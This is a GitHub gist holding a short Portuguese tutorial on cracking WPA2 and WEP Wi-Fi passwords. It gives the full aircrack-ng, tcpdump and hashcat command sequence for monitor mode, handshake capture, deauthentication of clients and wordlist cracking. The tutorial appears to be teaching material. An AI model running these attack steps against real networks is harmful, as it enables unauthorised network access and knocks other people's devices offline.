Skip to content

Instantly share code, notes, and snippets.

@0xacb 0xacb/tpas-wireless-cracking.md Secret
Last active Nov 23, 2018

Embed
What would you like to do?
TPAS Tutorial

TPAS - Wireless Cracking Tutorial

Instalar o aircrack-ng suite, wireshark e hashcat

Linux: apt install aircrack-ng wireshark hashcat

OSX: brew install aircrack-ng wireshark hashcat

hashcat-utils: https://github.com/hashcat/hashcat-utils

WPA2 Cracking

Linux

  • Obter wordlist (e.g. https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt)
  • Colocar interface em monitor mode: airmon-ng start wlan0
  • Obter o BSSID e channel da rede alvo com airodump-ng mon0
  • Utilizar o seguinte comando para capturar um 4-way Handshake (alterar channel e BSSID): airodump-ng -c 1 — bssid xx:xx:xx:xx:xx:xx -w capture.cap mon0
  • Enquanto esperamos pelo handshake podemos usar o aireplay para forçar que os clientes se voltem a ligar ao AP (deauth) com o comando: aireplay-ng -0 2 -a xx:xx:xx:xx:xx:xx mon0
  • Esperar pelo WPA handshake
  • cap2hccapx capture.cap capture.hccapx
  • hashcat -m 2500 capture.hccapx wordlist.txt

OSX

ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

export BSSID=xx:xx:xx:xx:xx:xx
export CHANNEL=1
sudo airport -z
sudo airport -c$CHANNEL
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 6 -i en0 -w beacon.cap
echo "Waiting for handshake... CTRL-C when frames > 4"
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
echo "Done"
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
cap2hccapx capture.cap capture.hccapx
  • Enquanto esperamos pelo handshake podemos usar o aireplay para forçar que os clientes se voltem a ligar ao AP (deauth) com a ferramenta https://github.com/unixpickle/JamWiFi
  • hashcat -m 2500 capture.hccapx wordlist.txt

WEP Cracking

  • Colocar a interface em monitor mode
  • Utilizar o airodump-ng ou Wireshark para capturar pacotes
  • Utilizar o aircrack-ng para crackar a chave aircrack-ng -1 -a 1 -b xx:xx:xx:xx:xx:xx capture.pcap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.